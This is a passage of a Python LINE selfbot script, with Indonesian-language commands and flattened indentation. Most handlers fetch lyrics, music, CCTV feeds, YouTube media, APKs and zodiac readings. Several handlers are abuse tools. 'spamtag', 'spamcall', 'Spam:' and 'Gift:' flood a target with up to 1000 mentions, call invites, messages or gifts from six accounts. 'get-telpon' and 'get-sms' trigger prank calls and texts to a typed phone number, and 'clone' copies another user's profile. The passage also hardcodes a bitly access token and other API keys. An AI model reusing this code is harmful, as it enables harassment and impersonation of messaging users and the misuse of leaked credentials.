s.headers['user-agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
r = s.get("https://www.wowkeren.com/lirik/lagu/{}/{}.html".format(urllib.parse.quote(artis), judul))
x = s.get("https://www.wowkeren.com/seleb/{}/lirik.html".format(urllib.parse.quote(artis)))
data = BeautifulSoup(r.content, 'html5lib')
data1 = BeautifulSoup(x.content, 'html5lib')
ret_ = ''
try:
yyk = data1.select("[class~=content]")[1].text
yoyok = yyk.replace(" ", " ")
ret_ += " 「 Informasi Penyanyi 」"+yoyok
ret = data.find("div", id="JudulHalaman")
ret_ += "Judul lagu : "+ret.get_text()
ret_ += "\n\n 「 Lirik Lagunya 」"+data.select("[class~=GambarUtama]")[1].text
for link in data1.findAll('div', attrs={'class':'item'}):
cl.sendImageWithURL(msg.to, "https://www.wowkeren.com"+link.find('img')['src'])
cl.sendMessage(to, ret_)
except:
cl.sendMessage(to, "lirik tidak tersedia")
elif cmd.startswith("get-lirik "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
url = "http://rahandiapi.herokuapp.com/lyricapi?key=betakey&q={}".format(urllib.parse.quote(search))
link = web.get(url)
data = link.text
data = json.loads(data)
start = timeit.timeit()
ret_ = "「 Lirik Search 」"
ret_ += "\n「✭」 Judul : {}".format(str(data["title"]))
ret_ += "\n「✭」 Time Taken : {}".format(str(start))
ret_ += "\n\n{}".format(str(data["lyric"]))
cl.sendText(msg.to, str(ret_))
elif cmd.startswith("musik "):
if msg._from in admin:
sep = msg.text.split(" ")
query = msg.text.replace(sep[0] + " ","")
cond = query.split("-")
search = str(cond[0])
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
result = web.get("http://api.ntcorp.us/joox/search?q={}".format(str(search)))
data = result.text
data = json.loads(data)
if len(cond) == 1:
num = 0
ret_ = "「 Pencarian Musik 」\n"
for music in data["result"]:
num += 1
ret_ += "\n {}. {}".format(str(num), str(music["single"]))
ret_ += "\n\n「 Total {} Pencarian 」".format(str(len(data["result"])))
cl.sendMessage(to, str(ret_))
sendMention(msg.to, msg._from,"","\nJika ingin menggunakan,\nSilahkan gunakan:\n\nMusik penyanyi-angka")
if len(cond) == 2:
num = int(cond[1])
if num <= len(data["result"]):
music = data["result"][num - 1]
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
result = web.get("http://api.ntcorp.us/joox/song_info?sid={}".format(str(music["sid"])))
data = result.text
data = json.loads(data)
if data["result"] != []:
ret_ = "「 Pencarian Musik 」"
ret_ += "\n• Judul : {}".format(str(data["result"]["song"]))
ret_ += "\n• Album : {}".format(str(data["result"]["album"]))
ret_ += "\n• Ukuran : {}".format(str(data["result"]["size"]))
ret_ += " \n• Link Musik : {}".format(str(data["result"]["mp3"]))
ret_ += "\n「 Tunggu Musiknya Keluar 」"
cl.sendImageWithURL(to, str(data["result"]["img"]))
cl.sendMessage(to, str(ret_))
cl.sendAudioWithURL(to, str(data["result"]["mp3"][0]))
elif cmd.startswith("kode wilayah"):
if msg._from in admin:
ret_ = "「 Daftar Kode Wilayah 」\n\n"
ret_ += "248 = Alternatif - Cibubur\n119 = Ancol - bandara\n238 = Asia afrika - Bandung\n169 = Asia afrika - Hang lekir"
ret_ += "\n276 = Asia afrika - Sudirman\n295 = Bandengan - kota\n294 = Bandengan - Selatan\n255 = Boulevard Barat raya"
ret_ += "\n102 = Buncit raya\n272 = Bundaran - HI\n93 = Cideng barat\n289 = Cikini raya\n242 = Ciledug raya - Cipulir"
ret_ += "\n175 = Ciloto - Puncak\n142 = Daan mogot - Grogol\n143 = Daan mogot - Pesing\n338 = Dewi sartika - Cawang"
ret_ += "\n124 = DI Panjaitan - By pass\n123 = DI Panjaitan - Cawang\n13 = Dr Satrio - Casablanca\n105 = Dr Satrio - Karet"
ret_ += "\n245 = Dukuh atas - MRT Jakarta\n334 = Fachrudin raya\n252 = Fatmawati - Blok A\n253 = Fatmawati - Cipete raya"
ret_ += "\n203 = Flyover Daan mogot\n336 = Flyover Jati baru\n172 = Flyover Senen - Kramat\n77 = Gunung sahari"
ret_ += "\n137 = Hasyim Ashari\n273 = Jalan MH Thamrin\n327 = Jalan RS Fatmawati\n292 = Jl. Otista 3\n333 = Jl. Panjang - Kebon jeruk"
ret_ += "\n226 = JORR - Bintaro\n227 = JORR - Fatmawati\n173 = Kramat raya - Senen\n117 = Kyai Caringin - Cideng\n126 = Letjen Suprapto - Senen"
ret_ += "\n204 = Mangga besar\n319 = Margaguna raya\n326 = Margonda raya\n310 = Mas Mansyur - Karet\n309 = Mas Mansyur - Tn. Abang"
ret_ += "\n64 = Matraman\n140 = Matraman - Salemba\n284 = Metro Pdk. Indah\n191 = MT Haryono - Pancoran\n160 = Pancoran barat"
ret_ += "\n331 = Pejompongan - Slipi\n332 = Pejompongan - Sudirman\n312 = Perempatan pramuka\n171 = Permata hijau - Panjang\n99 = Petojo Harmoni"
ret_ += "\n223 = Pramuka - Matraman\n222 = Pramuka raya\n314 = Pramuka raya - jl. Tambak\n313 = Pramuka - Salemba raya\n130 = Puncak raya KM84"
ret_ += "\n318 = Radio dalam raya\n328 = RS Fatmawati - TB\n274 = Senayan city\n132 = Slipi - Palmerah\n133 = Slipi - Tomang"
ret_ += "\n162 = S Parman - Grogol\n324 = Sudirman - Blok M\n18 = Sudirman - Dukuh atas\n325 = Sudirman - Semanggi\n112 = Sudirman - Setiabudi"
ret_ += "\n246 = Sudirman - Thamrin\n320 = Sultan agung - Sudirman\n100 = Suryo pranoto\n220 = Tanjung duren\n301 = Tol kebon jeruk"
ret_ += "\n41 = Tomang/Simpang\n159 = Tugu Pancoran\n145 = Warung jati - Pejaten\n205 = Yos Sudarso - Cawang\n206 = Yos Sudarso - Tj. Priuk"
ret_ += "\n\nUntuk melihat cctv,\nKetik lihat (kode wilayah)"
cl.sendMessage(to, ret_)
elif cmd.startswith("lihat "):
if msg._from in admin:
sep = msg.text.split(" ")
cct = msg.text.replace(sep[0] + " ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'
r = s.get("http://lewatmana.com/cam/{}/bundaran-hi/".format(urllib.parse.quote(cct)))
soup = BeautifulSoup(r.content, 'html5lib')
try:
ret_ = "「 Informasi CCTV 」\nDaerah "
ret_ += soup.select("[class~=cam-viewer-title]")[0].text
ret_ += "\nCctv update per 5 menit"
vid = soup.find('source')['src']
ret = "Untuk melihat wilayah lainnya, Ketik kode wilayah"
cl.sendMessage(to, ret_)
cl.sendVideoWithURL(to, vid)
cl.sendMessage(to, ret)
except:
cl.sendMessage(to, "Data cctv tidak ditemukan!")
elif cmd.startswith("ytmp3: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
bestaudio = vid.getbestaudio()
bestaudio.bitrate
best = vid.getbest()
best.resolution, best.extension
for s in stream:
shi = bestaudio.url
me = best.url
vin = s.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n┃ Author : ' + str(vid.author)
durasi = '\n┃ Duration : ' + str(vid.duration)
suka = '\n┃ Likes : ' + str(vid.likes)
rating = '\n┃ Rating : ' + str(vid.rating)
deskripsi = '\n┃ Deskripsi : ' + str(vid.description)
cl.sendImageWithURL(msg.to, me)
cl.sendAudioWithURL(msg.to, shi)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("ytmp4: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
for s in stream:
me = best.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n┃ Author : ' + str(vid.author)
durasi = '\n┃ Duration : ' + str(vid.duration)
suka = '\n┃ Likes : ' + str(vid.likes)
rating = '\n┃ Rating : ' + str(vid.rating)
deskripsi = '\n┃ Deskripsi : ' + str(vid.description)
cl.sendVideoWithURL(msg.to, me)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("get-image "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
url = "http://rahandiapi.herokuapp.com/imageapi?key=betakey&q={}".format(urllib.parse.quote(search))
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get(url)
data = r.text
data = json.loads(data)
if data["result"] != []:
start = timeit.timeit()
items = data["result"]
path = random.choice(items)
a = items.index(path)
b = len(items)
cl.sendText(msg.to,"「 Google Image 」\nType : Search Image\nTime taken : %seconds" % (start))
cl.sendImageWithURL(msg.to, str(path))
elif cmd.startswith("get-apk "):
if msg._from in admin:
sep = msg.text.split(" ")
query = msg.text.replace(sep[0] + " ","")
cond = query.split("|")
search = str(cond[0])
with requests.session() as s:
s.headers['user-agent'] = random.choice(settings["userAgent"])
r = s.get("https://apkpure.com/id/search?q={}".format(str(search)))
soup = BeautifulSoup(r.content, 'html5lib')
data = soup.findAll('dl', attrs={'class':'search-dl'})
if len(cond) == 1:
num = 0
ret_ = "「 Pencarian Aplikasi 」\n"
for apk in data:
num += 1
link = "https://apkpure.com"+apk.find('a')['href']
title = apk.find('a')['title']
ret_ += "\n {}. {}".format(str(num), str(title))
ret_ += "\n\n Total {} Result".format(str(len(data)))
ret = "Selanjutnya ketik:\nGet-apk {} | angka".format(str(search))
cl.sendMessage(to, str(ret_))
cl.sendMessage(to, str(ret))
elif len(cond) == 2:
num = int(cond[1])
if num <= len(data):
apk = data[num - 1]
with requests.session() as s:
s.headers['user-agent'] = random.choice(settings["userAgent"])
r = s.get("https://apkpure.com{}/download?from=details".format(str(apk.find('a')['href'])))
soup = BeautifulSoup(r.content, 'html5lib')
data = soup.findAll('div', attrs={'class':'fast-download-box'})
for down in data:
load = down.select("a[href*=https://download.apkpure.com/]")[0]
file = load['href']
ret_ = "File info :\n"+down.find('span', attrs={'class':'file'}).text
with requests.session() as web:
web.headers["user-agent"] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
r = web.get("https://api-ssl.bitly.com/v3/shorten?access_token=497e74afd44780116ed281ea35c7317285694bf1&longUrl={}".format(urllib.parse.quote(file)))
data = r.text
data = json.loads(data)
ret_ += "\nLink Download :\n"+data["data"]["url"]
cl.sendMessage(to, str(ret_))
elif cmd.startswith("get-anime "):
if msg._from in admin:
sep = msg.text.split(" ")
anime = msg.text.replace(sep[0] + " ","%20")
with requests.session() as web:
web.headers["user-agent"] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
r = web.get("https://kitsu.io/api/edge/anime?filter[text]={}".format(urllib.parse.quote(anime)))
data = r.text
data = json.loads(data)
ret_ = ''
if data["data"] != []:
for a in data["data"]:
if a["attributes"]["subtype"] == "TV":
sin = a["attributes"]["synopsis"]
translator = Translator()
hasil = translator.translate(sin, dest='id')
sinop = hasil.text
ret_ += '「 Anime {} 」'.format(str(a["attributes"]["canonicalTitle"]))
ret_ += '\n• Rilis : '+str(a["attributes"]["startDate"])
ret_ += '\n• Rating : '+str(a["attributes"]["ratingRank"])
ret_ += '\n• Type : '+str(a["attributes"]["subtype"])
ret_ += '\n• Sinopsis :\n'+str(sinop)
ret_ += '\n\n'
cl.sendImageWithURL(msg.to, str(a["attributes"]["posterImage"]["small"]))
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-zodiak "):
if msg._from in admin:
sep = msg.text.split(" ")
query = text.replace(sep[0] + " ","")
r = requests.post("https://aztro.herokuapp.com/?sign={}&day=today".format(urllib.parse.quote(query)))
data = r.text
data = json.loads(data)
data1 = data["description"]
data2 = data["color"]
translator = Translator()
hasil = translator.translate(data1, dest='id')
hasil1 = translator.translate(data2, dest='id')
A = hasil.text
B = hasil1.text
ret_ = "「 Ramalan zodiak {} hari ini 」\n".format(str(query))
ret_ += str(A)
ret_ += "\n======================\n• Tanggal : " +str(data["current_date"])
ret_ += "\n• Rasi bintang : "+query
ret_ += " ("+str(data["date_range"]+")")
ret_ += "\n• Pasangan Zodiak : " +str(data["compatibility"])
ret_ += "\n• Angka keberuntungan : " +str(data["lucky_number"])
ret_ += "\n• Waktu keberuntungan : " +str(data["lucky_time"])
ret_ += "\n• Warna kesukaan : " +str(B)
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-bintang "):
if msg._from in admin:
sep = msg.text.split(" ")
url = msg.text.replace(sep[0] + " ","")
with requests.session() as s:
s.headers['user-agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
r = s.get("https://www.vemale.com/zodiak/{}".format(urllib.parse.quote(url)))
soup = BeautifulSoup(r.content, 'html5lib')
ret_ = ""
for a in soup.select('div.vml-zodiak-detail'):
ret_ += a.h1.string
ret_ += "\n"+ a.h4.string
ret_ += " : "+ a.span.string +""
for b in soup.select('div.col-center'):
ret_ += "\nTanggal : "+ b.string
for d in soup.select('div.number-zodiak'):
ret_ += "\nAngka keberuntungan : "+ d.string
for c in soup.select('div.paragraph-left'):
ta = c.text
tab = ta.replace(" ", "")
tabs = tab.replace(".", ".\n")
ret_ += "\n"+ tabs
#print (ret_)
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-telpon "):
if msg._from in admin:
sep = msg.text.split(" ")
nomor = text.replace(sep[0] + " ","")
r = requests.get("http://apisora2.herokuapp.com/prank/call/?no={}".format(urllib.parse.quote(nomor)))
data = r.text
data = json.loads(data)
ret_ = "「 Prangked Telpon 」"
ret_ += "\n• Status : {}".format(str(data["status"]))
ret_ += "\n• Tujuan "+str(data["result"])
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-sms "):
if msg._from in admin:
sep = msg.text.split(" ")
nomor = text.replace(sep[0] + " ","")
r = requests.get("http://apisora2.herokuapp.com/prank/sms/?no={}".format(urllib.parse.quote(nomor)))
data = r.text
data = json.loads(data)
ret_ = "「 Prangked Sms 」"
ret_ += "\n• Status : {}".format(str(data["status"]))
ret_ += "\n• Tujuan "+str(data["result"])
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-mimpi "):
if msg._from in admin:
sep = msg.text.split(" ")
mimpi = msg.text.replace(sep[0] + " ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
r = s.get("http://primbon.com/tafsir_mimpi.php?mimpi={}&submit=+Submit+".format(urllib.parse.quote(mimpi)))
soup = BeautifulSoup(r.content, 'html5lib')
for anu in soup.find_all('i'):
ret_ = anu.get_text()
cl.sendMessage(msg.to,ret_)
elif text.lower() == 'top kaskus':
if msg._from in admin:
r = requests.get("https://api.bayyu.net/kaskus-hotthread/?apikey=c28c944199384f191335f1f8924414fa839350d&page=2")
data=r.text
data=json.loads(data)
if data["hot_threads"] != []:
no = 0
hasil = "「 Kaskus Search 」\n"
for news in data["hot_threads"]:
no += 1
hasil += "\n" + str(no) + ". Judul : " + str(news["title"]) + "\n • Deskripsi : " + str(news["detail"]) + "\n• Link: " + str(news["link"]) + "\n"
hasil += "\n"
cl.sendText(msg.to, str(hasil))
elif cmd.startswith("get-video "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
url = web.get("http://rahandiapi.herokuapp.com/youtubeapi/search?key=betakey&q={}".format(urllib.parse.quote(search)))
data = url.text
data = json.loads(data)
if data["result"] != []:
video = random.choice(data["result"]["videolist"])
vid = video["url"]
start = timeit.timeit()
ret = "「 Informasi Video 」\n"
ret += "• Judul : {}".format(str(data["result"]["title"]))
ret += "\n• Author : {}".format(str(data["result"]["author"]))
ret += "\n• Durasi : {}".format(str(data["result"]["duration"]))
ret += "\n• Like nya : {}".format(str(data["result"]["likes"]))
ret += "\n• Rating : {}".format(str(data["result"]["rating"]))
ret += "\n• TimeTaken : {}".format(str(start))
ret += "\n• Deskripsi : {}\n「 Waiting Encoding 」".format(str(data["result"]["description"]))
cl.sendText(msg.to, str(ret))
cl.sendVideoWithURL(msg.to, str(vid))
elif cmd.startswith("get-mp3 "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
url = web.get("http://rahandiapi.herokuapp.com/youtubeapi/search?key=betakey&q={}".format(urllib.parse.quote(search)))
data = url.text
data = json.loads(data)
if data["result"] != []:
audio = random.choice(data["result"]["audiolist"])
aud = audio["url"]
start = timeit.timeit()
ret = "「 Informasi Mp3 」\n"
ret += "• Judul : {}".format(str(data["result"]["title"]))
ret += "\n• Author : {}".format(str(data["result"]["author"]))
ret += "\n• Durasi : {}".format(str(data["result"]["duration"]))
ret += "\n• Like nya : {}".format(str(data["result"]["likes"]))
ret += "\n• Rating : {}".format(str(data["result"]["rating"]))
ret += "\n• TimeTaken : {}".format(str(start))
ret += "\n• Deskripsi : {}\n「 Waiting Encoding 」".format(str(data["result"]["description"]))
cl.sendText(msg.to, str(ret))
cl.sendAudioWithURL(msg.to, str(aud))
elif cmd.startswith("get-instagram "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
instagram = msg.text.replace(sep[0] + " ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['graphql']['user']['full_name'])
bioIG = str(data['graphql']['user']['biography'])
mediaIG = str(data['graphql']['user']['edge_owner_to_timeline_media']['count'])
verifIG = str(data['graphql']['user']['is_verified'])
usernameIG = str(data['graphql']['user']['username'])
followerIG = str(data['graphql']['user']['edge_followed_by']['count'])
profileIG = data['graphql']['user']['profile_pic_url_hd']
privateIG = str(data['graphql']['user']['is_private'])
followIG = str(data['graphql']['user']['edge_follow']['count'])
link = "• Link : " + "https://www.instagram.com/" + instagram
text = "「 Instagram User 」\n• Name : "+namaIG+"\n• Username : "+usernameIG+"\n• Follower : "+followerIG+"\n• Following : "+followIG+"\n• Total post : "+mediaIG+"\n• Verified : "+verifIG+"\n• Private : "+privateIG+"\n• Biography : "+bioIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendMessage(msg.to, str(text))
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("get-date "):
if msg._from in admin:
sep = msg.text.split(" ")
tanggal = msg.text.replace(sep[0] + " ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendMessage(msg.to,"「 Date Info 」\n"+"「✭」 Date Of Birth : "+lahir+"\n「✭」 Age : "+usia+"\n「✭」 Ultah : "+ultah+"\n「✭」 Zodiak : "+zodiak)
elif cmd.startswith("clone "):
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
contact = mention["M"]
break
try:
cl.cloneContactProfile(contact)
ryan = cl.getContact(contact)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Clone Profile 」\nTarget nya "
ret_ = "Berhasil clone profile target"
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except:
cl.sendMessage(msg.to, "Gagal clone profile")
elif text.lower() == 'restore':
if msg._from in admin:
try:
lineProfile.displayName = str(myProfile["displayName"])
lineProfile.statusMessage = str(myProfile["statusMessage"])
lineProfile.pictureStatus = str(myProfile["pictureStatus"])
cl.updateProfileAttribute(8, lineProfile.pictureStatus)
cl.updateProfile(lineProfile)
sendMention(msg.to, sender, "「 Restore Profile 」\nNama ", " \nBerhasil restore profile")
except:
cl.sendMessage(msg.to, "Gagal restore profile")
elif cmd.startswith("spamtag: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
Setmain["limit"] = num
cl.sendText(msg.to,"「 Status Spamtag 」\nBerhasil diubah jadi {} kali".format(str(strnum)))
elif cmd.startswith("spamcall: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
wait["limit"] = num
cl.sendText(msg.to,"「 Status Spamcall 」\nBerhasil diubah jadi {} kali".format(str(strnum)))
elif cmd.startswith("spamtag "):
if wait["selfbot"] == True:
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(Setmain["limit"])
if jmlh <= 1000:
for x in range(jmlh):
try:
cl.sendMessage1(msg)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi 1000")
elif cmd.startswith("panggil "):
if wait["selfbot"] == True:
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(key1)
if jmlh <= 1000:
for x in range(jmlh):
try:
cl.sendMessage1(msg)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd == "spamcall":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
group = cl.getGroup(to)
members = [mem.mid for mem in group.members]
cl.sendMessage(msg.to, "Berhasil mengundang {} undangan Call Grup".format(str(wait["limit"])))
call.acquireGroupCallRoute(to)
call.inviteIntoGroupCall(to, contactIds=members)
elif cmd.startswith("spamcall "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(" ")
strnum = text.replace(proses[0] + " ","")
group = cl.getGroup(to)
members = [mem.mid for mem in group.members]
jumlah = int(strnum)
cl.sendText(msg.to,"Undangan call grup {} sukses".format(str(strnum)))
if jumlah <= 1000:
for x in range(jumlah):
try:
call.acquireGroupCallRoute(to)
call.inviteIntoGroupCall(to, contactIds=members)
except Exception as e:
cl.sendText(msg.to,str(e))
elif 'Gift: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Gift: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
cl.sendText(msg.to,"「 Spam Gift 」\nBerhasil spamgift {} kali".format(str(jumlah)))
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
ki.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kk.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kc.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
km.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kb.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
elif 'Spam: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Spam: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, str(Setmain["message1"]))
ki.sendMessage(midd, str(Setmain["message1"]))
kk.sendMessage(midd, str(Setmain["message1"]))
kc.sendMessage(midd, str(Setmain["message1"]))
km.sendMessage(midd, str(Setmain["message1"]))
kb.sendMessage(midd, str(Setmain["message1"]))
#=========== [ Add Image ] ============#
elif cmd.startswith("addimg "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name not in images:
wait["Addimage"]["status"] = True
wait["Addimage"]["name"] = str(name.lower())
images[str(name.lower())] = ""
f = codecs.open("image.json","w","utf-8")
json.dump(images, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Silahkan kirim fotonya...")
else:
cl.sendText(msg.to, "Foto itu sudah dalam list")
elif cmd.startswith("dellimg "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name in images:
cl.deleteFile(images[str(name.lower())])
del images[str(name.lower())]
f = codecs.open("image.json","w","utf-8")
json.dump(images, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Berhasil menghapus {}".format( str(name.lower())))
else:
cl.sendText(msg.to, "Foto itu tidak ada dalam list")
elif text.lower() == "listimage":
if msg._from in admin:
no = 0
ret_ = "「 Daftar Image 」\n\n"
for image in images:
no += 1
ret_ += str(no) + ". " + image.title() + "\n"
ret_ += "\nTotal「{}」Images".format(str(len(images)))
cl.sendText(to, ret_)
#=========== [ Add Video ] ============#
elif cmd.startswith("addvideo "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name not in videos:
wait["Addvideo"]["status"] = True
wait["Addvideo"]["name"] = str(name.lower())
videos[str(name.lower())] = ""
f = codecs.open("video.json","w","utf-8")
json.dump(videos, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Silahkan kirim videonya...")
else:
cl.sendText(msg.to, "Video itu sudah dalam list")
elif cmd.startswith("dellvideo "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name in videos:
cl.deleteFile(videos[str(name.lower())])
del videos[str(name.lower())]
f = codecs.open("video.json","w","utf-8")
json.dump(videos, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Berhasil menghapus video {}".format( str(name.lower())))
else:
cl.sendText(msg.to, "Video itu tidak ada dalam list")
elif text.lower() == "listvideo":
if msg._from in admin:
no = 0
ret_ = "「 Daftar Video 」\n\n"
for video in videos:
no += 1
ret_ += str(no) + ". " + video.title() + "\n"
ret_ += "\nTotal「{}」Videos".format(str(len(videos)))
cl.sendText(to, ret_)
sendMention(msg.to, msg._from,"","\nJika ingin play video nya,\nSilahkan ketik nama - judul\nBisa juga ketik namanya saja")
#=========== [ Add Video ] ============#
elif cmd.startswith("addmp3 "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name not in audios:
